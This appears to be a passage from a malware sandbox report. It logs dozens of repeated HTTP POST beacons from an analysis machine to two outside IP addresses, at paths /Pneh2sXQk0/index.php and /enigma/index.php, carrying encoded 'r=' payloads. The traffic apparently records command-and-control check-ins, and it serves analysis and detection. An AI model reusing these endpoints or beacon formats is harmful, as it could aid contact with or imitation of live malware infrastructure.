                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                                                                                                                      1499    192.168.2.5    51355    193.233.132.56    80
                                                                                                                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.350752115 CEST    158    OUT    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.595534086 CEST    219    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                                                                                                                      1500    192.168.2.5    51356    193.233.132.167    80
                                                                                                                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.423852921 CEST    309    OUT    POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.670919895 CEST    196    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                                                                                                                      1501    192.168.2.5    51357    193.233.132.56    80
                                                                                                                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.841763020 CEST    312    OUT    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.086442947 CEST    196    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                                                                                                                      1502    192.168.2.5    51358    193.233.132.167    80
                                                                                                                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.010555983 CEST    155    OUT    POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.258614063 CEST    197    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                                                                                                                      1503    192.168.2.5    51359    193.233.132.56    80
                                                                                                                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.415822029 CEST    158    OUT    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.659835100 CEST    219    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                                                                                                                      1504    192.168.2.5    51360    193.233.132.167    80
                                                                                                                                                                                                                                      Timestamp    Bytes transferred    Direction    Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.522202969 CEST    309    OUT    POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.782394886 CEST    196    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1505 | 192.168.2.5 | 51361 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.907073021 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.153429031 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1506 | 192.168.2.5 | 51362 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.119824886 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.367908001 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1507 | 192.168.2.5 | 51363 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.383729935 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.637252092 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1508 | 192.168.2.5 | 51364 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.486304045 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.745759964 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1509 | 192.168.2.5 | 51365 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.978480101 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:54.227693081 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1510 | 192.168.2.5 | 51366 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:54.003900051 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:54.255393982 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1511 | 192.168.2.5 | 51367 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:54.473515987 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:54.718034029 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1512 | 192.168.2.5 | 51368 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:54.589934111 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:54.839196920 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1513 | 192.168.2.5 | 51369 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:55.059140921 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:55.307837963 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1514 | 192.168.2.5 | 51370 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:55.090743065 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:55.338251114 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1515 | 192.168.2.5 | 51371 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:55.567786932 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:55.823369980 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1516 | 192.168.2.5 | 51372 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:55.668411016 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:55.916929007 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1517 | 192.168.2.5 | 51373 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:56.167634964 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
